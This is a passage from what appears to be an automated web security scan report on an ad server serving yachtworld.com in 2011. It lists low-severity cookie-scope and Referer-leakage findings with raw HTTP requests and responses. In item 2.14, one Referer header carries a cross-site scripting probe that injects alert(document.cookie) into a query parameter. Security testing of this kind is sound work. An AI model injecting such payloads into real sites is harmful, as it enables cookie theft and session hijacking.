The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1673595005@Top1,Right1?&man=regulator&type=used&minyr=2004&minpr=0&minl=24&maxl=32 HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXQsU30erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:23:45 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXRZU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1259
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/275086
...[SNIP]...

2.12. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1960522682@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1960522682@Top1,Right1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1960522682@Top1,Right1?&man=regulator&type=used&minyr=2004&minpr=0&minl=24&maxl=32 HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cint=100&fromYear=2004&Ntk=boatsEN&searchtype=homepage&hmid=0&sm=3&enid=0&currencyid=100&toLength=32&cit=true&luom=126&boatsAddedSelected=-1&fromLength=24&fromPrice=0&ftid=0&man=regulator&slim=quick&is=false&No=10
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXRZU30erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:25:05 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXSrU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1215
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/155214
...[SNIP]...

2.13. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1976854735@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1976854735@Top1,Right1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1976854735@Top1,Right1?&man=regulator&type=used&minyr=2004&minpr=0&minl=24&maxl=32 HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXQCU30erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:23:02 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXQsU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1213
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/112587
...[SNIP]...

2.14. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1206775208@Right1,Top1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1206775208@Right1,Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1206775208@Right1,Top1? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US33d06'%3balert(document.cookie)//ec734b2bd35
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXSrU30erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:59:17 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXzx; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 770
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1072889542/Right1/default/em
...[SNIP]...

2.15. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1452865909@Right1,Top1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1452865909@Right1,Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1452865909@Right1,Top1 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXzx;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 03:25:10 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiexS; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 768
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/711547878/Right1/default/emp
...[SNIP]...

2.16. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiXkhU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?
...[SNIP]...

2.17. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiXkkU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?
...[SNIP]...

2.18. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiXkkU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?
...[SNIP]...

2.19. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiXkcU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

2.20. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1042378034/Top1/default/empty.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1042378034/Top1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1042378034/Top1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXzx;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 03:25:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiexU; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

2.21. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1072889542/Right1/default/empty.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1072889542/Right1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1072889542/Right1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXzx;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 03:25:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiexT; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

2.22. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1205137974/Right1/default/empty.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1205137974/Right1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1205137974/Right1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXzx;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 03:25:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiexU; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

2.23. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/400899855/Top1/default/empty.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/400899855/Top1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/400899855/Top1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXzx;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 03:25:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiexV; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

3. Cross-domain Referer leakage  previous  next
There are 20 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/198824290/Right1/Boats/galati2-yen-as/galati2-maritimo-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/198824290/Right1/Boats/galati2-yen-as/galati2-maritimo-sky.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/198824290/Right1/Boats/galati2-yen-as/galati2-maritimo-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://yacht.galatiyachts.com/maritimo-yachts/?utm_source=yachtworld&utm_medium=banner&utm_campaign=maritimo
Content-Length: 393
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
